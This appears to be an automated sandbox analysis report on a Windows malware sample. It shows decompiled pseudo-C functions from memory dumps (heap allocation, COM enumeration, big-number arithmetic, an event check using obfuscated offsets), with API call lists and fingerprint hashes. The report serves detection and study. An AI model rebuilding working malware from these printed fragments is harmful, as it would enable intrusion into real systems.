                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t42 =  *0x31ad380; // 0x5bd9b28
                                                                                                                                  				_push(0x800);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push( *0x31ad270);
                                                                                                                                  				if( *0x31ad284 >= 5) {
                                                                                                                                  					if(RtlAllocateHeap() == 0) {
                                                                                                                                  						L6:
                                                                                                                                  						_t30 = 8;
                                                                                                                                  						L7:
                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                  							L10:
                                                                                                                                  							 *0x31ad284 =  *0x31ad284 + 1;
                                                                                                                                  							L11:
                                                                                                                                  							return _t30;
                                                                                                                                  						}
                                                                                                                                  						_t44 = _a4;
                                                                                                                                  						_t40 = _v8;
                                                                                                                                  						 *_a16 = _a4;
                                                                                                                                  						 *_a20 = E031A789B(_t44, _t40);
                                                                                                                                  						_t18 = E031A3720(_t40, _t44);
                                                                                                                                  						if(_t18 != 0) {
                                                                                                                                  							 *_a8 = _t40;
                                                                                                                                  							 *_a12 = _t18;
                                                                                                                                  							if( *0x31ad284 < 5) {
                                                                                                                                  								 *0x31ad284 =  *0x31ad284 & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						_t30 = 0xbf;
                                                                                                                                  						E031A47D5();
                                                                                                                                  						HeapFree( *0x31ad270, 0, _t40);
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					_t24 = E031A44A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                  					L5:
                                                                                                                                  					_t30 = _t24;
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				if(RtlAllocateHeap() == 0) {
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				_t24 = E031A6109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                                                                                                                  				goto L5;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 031A57A1
                                                                                                                                    • Part of subcall function 031A6109: GetTickCount.KERNEL32 ref: 031A611D
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A616D
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A618A
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A61B6
                                                                                                                                    • Part of subcall function 031A6109: HeapFree.KERNEL32(00000000,?), ref: 031A61C8
                                                                                                                                    • Part of subcall function 031A6109: wsprintfA.USER32 ref: 031A61E9
                                                                                                                                    • Part of subcall function 031A6109: HeapFree.KERNEL32(00000000,?), ref: 031A61F9
                                                                                                                                    • Part of subcall function 031A6109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031A6227
                                                                                                                                    • Part of subcall function 031A6109: GetTickCount.KERNEL32 ref: 031A6238
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 031A57BF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000002,031A553A,?,031A553A,00000002,?,?,031A53C9,?), ref: 031A581C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1676223858-8415677
                                                                                                                                  • Opcode ID: fd3803592e50afd22b093e8c11455208aaca639c5a87edcd05490b26bf4a00dc
                                                                                                                                  • Instruction ID: 38ea9d3235050095aa2563f45de79d394fd5d3e58f0b76eef686ae707ace3200
                                                                                                                                  • Opcode Fuzzy Hash: fd3803592e50afd22b093e8c11455208aaca639c5a87edcd05490b26bf4a00dc
                                                                                                                                  • Instruction Fuzzy Hash: 1821417A200A09EBCB05EFA9D994E9A37ADEB4D353F110016F942E7640DB70D945DBB0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8FDF6D
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F681A
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6837
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6854
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6866
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6879
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FDFFA
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FE014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                  • Opcode ID: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction ID: 6dcc549fe59e99c9fe3fc5f3eba8f0bf9d81947785cd0296121c9bca1ad7a167
                                                                                                                                  • Opcode Fuzzy Hash: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction Fuzzy Hash: E02171B1904B56AFD721CFB98450B7BBAECAF18258B040E1EA459C7A41D774D602CFD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                  • Opcode ID: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction ID: 3e96006575a0a05f8f3ff08aa6ed7046c1720db0e26f2fecf60b3499a05e8932
                                                                                                                                  • Opcode Fuzzy Hash: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction Fuzzy Hash: 992183B1904B56AFD761CFB9845077BBEECAF18244F440A1EE499C7A41E734D642CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E031A5920(intOrPtr* __eax) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				WCHAR* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _v32;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				short _v48;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				short _v64;
                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				intOrPtr* _t58;
                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				short _t67;
                                                                                                                                  				intOrPtr* _t68;
                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                  				intOrPtr* _t72;
                                                                                                                                  				intOrPtr* _t75;
                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                  				intOrPtr _t79;
                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				intOrPtr _t103;
                                                                                                                                  				intOrPtr _t109;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				intOrPtr _t130;
                                                                                                                                  
                                                                                                                                  				_t123 = _t122 - 0x3c;
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_push(__eax);
                                                                                                                                  				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                  				if(_t118 >= 0) {
                                                                                                                                  					_t54 = _v8;
                                                                                                                                  					_t103 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t5 = _t103 + 0x31ae038; // 0x3050f485
                                                                                                                                  					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                  					_t56 = _v8;
                                                                                                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                  					if(_t118 >= 0) {
                                                                                                                                  						__imp__#2(0x31ac2b0);
                                                                                                                                  						_v28 = _t57;
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_t118 = 0x8007000e;
                                                                                                                                  						} else {
                                                                                                                                  							_t60 = _v32;
                                                                                                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                  							_t87 = __imp__#6;
                                                                                                                                  							_t118 = _t61;
                                                                                                                                  							if(_t118 >= 0) {
                                                                                                                                  								_t63 = _v24;
                                                                                                                                  								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                  								if(_t118 >= 0) {
                                                                                                                                  									_t130 = _v20;
                                                                                                                                  									if(_t130 != 0) {
                                                                                                                                  										_t67 = 3;
                                                                                                                                  										_v64 = _t67;
                                                                                                                                  										_v48 = _t67;
                                                                                                                                  										_v56 = 0;
                                                                                                                                  										_v40 = 0;
                                                                                                                                  										if(_t130 > 0) {
                                                                                                                                  											while(1) {
                                                                                                                                  												_t68 = _v24;
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												_t123 = _t123;
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                  												if(_t118 < 0) {
                                                                                                                                  													goto L16;
                                                                                                                                  												}
                                                                                                                                  												_t70 = _v8;
                                                                                                                                  												_t109 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  												_t28 = _t109 + 0x31ae0bc; // 0x3050f1ff
                                                                                                                                  												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                  												if(_t118 >= 0) {
                                                                                                                                  													_t75 = _v16;
                                                                                                                                  													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                  													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                  														_t79 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  														_t33 = _t79 + 0x31ae078; // 0x76006f
                                                                                                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                  															_t83 = _v16;
                                                                                                                                  															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                  														}
                                                                                                                                  														 *_t87(_v12);
                                                                                                                                  													}
                                                                                                                                  													_t77 = _v16;
                                                                                                                                  													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                  												}
                                                                                                                                  												_t72 = _v8;
                                                                                                                                  												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                  												_v40 = _v40 + 1;
                                                                                                                                  												if(_v40 < _v20) {
                                                                                                                                  													continue;
                                                                                                                                  												}
                                                                                                                                  												goto L16;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L16:
                                                                                                                                  								_t65 = _v24;
                                                                                                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                  							}
                                                                                                                                  							 *_t87(_v28);
                                                                                                                                  						}
                                                                                                                                  						_t58 = _v32;
                                                                                                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t118;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(031AC2B0), ref: 031A5970
                                                                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 031A5A51
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A5A6A
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 031A5A99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1885612795-0
                                                                                                                                  • Opcode ID: 8188d7a4ffbbb144be4b84affb55701c2435caa3130b00a23f9909253a90e442
                                                                                                                                  • Instruction ID: bb18cac780cb99813f770f22bc0a3f92908153be0bdbd0ae8194dad3110bd91e
                                                                                                                                  • Opcode Fuzzy Hash: 8188d7a4ffbbb144be4b84affb55701c2435caa3130b00a23f9909253a90e442
                                                                                                                                  • Instruction Fuzzy Hash: B5515079E00919EFCB01DFA8C5888AEF7BAFF8D701B144595E915EB214D731AD41CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 031A32AE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A3393
                                                                                                                                    • Part of subcall function 031A5920: SysAllocString.OLEAUT32(031AC2B0), ref: 031A5970
                                                                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 031A33E6
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A33F5
                                                                                                                                    • Part of subcall function 031A3D39: Sleep.KERNEL32(000001F4), ref: 031A3D81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3193056040-0
                                                                                                                                  • Opcode ID: 5c58974ee786e3b6e0af2339962f3171ea3b604ae0cc1bf3282e7d612979518d
                                                                                                                                  • Instruction ID: fdf300eed13ff1c3c17b75482580fb8a5a8b848233fd3f10c4cd154358ec7a62
                                                                                                                                  • Opcode Fuzzy Hash: 5c58974ee786e3b6e0af2339962f3171ea3b604ae0cc1bf3282e7d612979518d
                                                                                                                                  • Instruction Fuzzy Hash: 13515C7D604A09EFDB01DFA8C848A9EB7B5BF8C741B188C29E515DB210DB71ED46CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                  			E031A7B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				void _v156;
                                                                                                                                  				void _v428;
                                                                                                                                  				void* _t55;
                                                                                                                                  				unsigned int _t56;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t79;
                                                                                                                                  				void* _t81;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				signed int* _t99;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t107;
                                                                                                                                  
                                                                                                                                  				_t92 = _a12;
                                                                                                                                  				_t101 = __eax;
                                                                                                                                  				_t55 = E031A47C4(_a16, _t92);
                                                                                                                                  				_t79 = _t55;
                                                                                                                                  				if(_t79 == 0) {
                                                                                                                                  					L18:
                                                                                                                                  					return _t55;
                                                                                                                                  				}
                                                                                                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                  				_t81 = 0;
                                                                                                                                  				_t96 = 0x20;
                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                  					L4:
                                                                                                                                  					_t97 = _t96 - _t81;
                                                                                                                                  					_v12 = _t96 - _t81;
                                                                                                                                  					E031A227C(_t79,  &_v428);
                                                                                                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E031A3C06(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                  					E031A3C06(_t79,  &_v156, _a12, _t97);
                                                                                                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                  					_t66 = E031A227C(_t101, 0x31ad168);
                                                                                                                                  					_t103 = _t101 - _t79;
                                                                                                                                  					_a8 = _t103;
                                                                                                                                  					if(_t103 < 0) {
                                                                                                                                  						L17:
                                                                                                                                  						E031A227C(_a16, _a4);
                                                                                                                                  						E031A3450(_t79,  &_v428, _a4, _t97);
                                                                                                                                  						memset( &_v428, 0, 0x10c);
                                                                                                                                  						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                  					do {
                                                                                                                                  						if(_v8 != 0xffffffff) {
                                                                                                                                  							_push(1);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( *_t99);
                                                                                                                                  							L031AAED0();
                                                                                                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                  							asm("adc edx, esi");
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(_v8 + 1);
                                                                                                                                  							_push(_t92);
                                                                                                                                  							_push(_t74);
                                                                                                                                  							L031AAECA();
                                                                                                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                  								_t74 = _t74 | 0xffffffff;
                                                                                                                                  								_v16 = _v16 & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t74 =  *_t99;
                                                                                                                                  						}
                                                                                                                                  						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                  						_a12 = _t74;
                                                                                                                                  						_t76 = E031A2420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                  						while(1) {
                                                                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                                                                  							if( *_t99 != 0) {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							L13:
                                                                                                                                  							_t92 =  &_v156;
                                                                                                                                  							if(E031A3F60(_t79, _t92, _t106) < 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							L14:
                                                                                                                                  							_a12 = _a12 + 1;
                                                                                                                                  							_t76 = E031A2775(_t79,  &_v156, _t106, _t106);
                                                                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                                                                  							if( *_t99 != 0) {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_a8 = _a8 - 1;
                                                                                                                                  						_t66 = _a12;
                                                                                                                                  						_t99 = _t99 - 4;
                                                                                                                                  						 *(0x31ad168 + _a8 * 4) = _t66;
                                                                                                                                  					} while (_a8 >= 0);
                                                                                                                                  					_t97 = _v12;
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  				while(_t81 < _t96) {
                                                                                                                                  					_t81 = _t81 + 1;
                                                                                                                                  					_t56 = _t56 >> 1;
                                                                                                                                  					if(_t56 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L4;
                                                                                                                                  				}
                                                                                                                                  				goto L4;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 031A7BE3
                                                                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 031A7BF9
                                                                                                                                  • memset.NTDLL ref: 031A7CA2
                                                                                                                                  • memset.NTDLL ref: 031A7CB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3041852380-0
                                                                                                                                  • Opcode ID: 03c8a768085c2f5c4c9dfc37262a6471f894c6348c8c4b73c8a534286ed5d131
                                                                                                                                  • Instruction ID: 4533632b5438df054bc21a9240a4c1f875eee70ceef64961fbdbc636d1ffa5d5
                                                                                                                                  • Opcode Fuzzy Hash: 03c8a768085c2f5c4c9dfc37262a6471f894c6348c8c4b73c8a534286ed5d131
                                                                                                                                  • Instruction Fuzzy Hash: B841A279A00619ABDB10EFACCC40BEEB7B5EF4E311F104565F9199B280DB709A558B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E031A7CC7(signed int _a4, signed int* _a8) {
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				signed int _t6;
                                                                                                                                  				intOrPtr _t8;
                                                                                                                                  				intOrPtr _t12;
                                                                                                                                  				short* _t19;
                                                                                                                                  				void* _t25;
                                                                                                                                  				signed int* _t28;
                                                                                                                                  				CHAR* _t30;
                                                                                                                                  				long _t31;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  
                                                                                                                                  				_t6 =  *0x31ad2a8; // 0xd448b889
                                                                                                                                  				_t32 = _a4;
                                                                                                                                  				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                  				_t8 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t3 = _t8 + 0x31ae876; // 0x61636f4c
                                                                                                                                  				_t25 = 0;
                                                                                                                                  				_t30 = E031A3CC2(_t3, 1);
                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                  					_t25 = CreateEventA(0x31ad2e4, 1, 0, _t30);
                                                                                                                                  					E031A4AAB(_t30);
                                                                                                                                  				}
                                                                                                                                  				_t12 =  *0x31ad294; // 0x4000000a
                                                                                                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E031A4A03() != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					_t28 = _a8;
                                                                                                                                  					if(_t28 != 0) {
                                                                                                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                  					}
                                                                                                                                  					_t31 = E031A1000(_t32, 0);
                                                                                                                                  					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                  					}
                                                                                                                                  					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                  					}
                                                                                                                                  					goto L20;
                                                                                                                                  				} else {
                                                                                                                                  					_t19 =  *0x31ad108( *_t32, 0x20);
                                                                                                                                  					if(_t19 != 0) {
                                                                                                                                  						 *_t19 = 0;
                                                                                                                                  						_t19 = _t19 + 2;
                                                                                                                                  					}
                                                                                                                                  					_t31 = E031A5AB2(0,  *_t32, _t19, 0);
                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                  						if(_t25 == 0) {
                                                                                                                                  							L22:
                                                                                                                                  							return _t31;
                                                                                                                                  						}
                                                                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                  						if(_t31 == 0) {
                                                                                                                                  							L20:
                                                                                                                                  							if(_t25 != 0) {
                                                                                                                                  								CloseHandle(_t25);
                                                                                                                                  							}
                                                                                                                                  							goto L22;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A3CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05BD9B38,00000000,?,?,69B25F44,00000005,031AD00C,?,?,031A539B), ref: 031A3CF8
                                                                                                                                    • Part of subcall function 031A3CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 031A3D1C
                                                                                                                                    • Part of subcall function 031A3CC2: lstrcat.KERNEL32(00000000,00000000), ref: 031A3D24
                                                                                                                                  • CreateEventA.KERNEL32(031AD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,031A21B6,?,00000001,?), ref: 031A7D08
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,031A21B6,00000000,00000000,?,00000000,?,031A21B6,?,00000001,?,?,?,?,031A555B), ref: 031A7D68
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,031A21B6,?,00000001,?), ref: 031A7D96
                                                                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,031A21B6,?,00000001,?,?,?,?,031A555B), ref: 031A7DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 73268831-0
                                                                                                                                  • Opcode ID: 3ddf5819deb1e89a466cc6d62dd5bc53b9adbdc6aff4c1db3b4f3cf2e51a9e97
                                                                                                                                  • Instruction ID: a3ccf2b21ebba7fa7da5d748933ca970e317460ec46f4ac0718f642d1cf38ed1
                                                                                                                                  • Opcode Fuzzy Hash: 3ddf5819deb1e89a466cc6d62dd5bc53b9adbdc6aff4c1db3b4f3cf2e51a9e97
                                                                                                                                  • Instruction Fuzzy Hash: E121263E600F425BC731EAAC9C44A7BF799FF8C713F190626F946DB184DB60C94182A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1384045349-0
                                                                                                                                  • Opcode ID: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction ID: 0903cdbf6cd7a2f8dbe30e1ef9198d78cd119f97495db3acb285da0d538c4767
                                                                                                                                  • Opcode Fuzzy Hash: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction Fuzzy Hash: 5D4106B1C00258DFDB14CFE8C940BDDBBB8BF49308F108AA9E419AB281EB755A44CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 40%
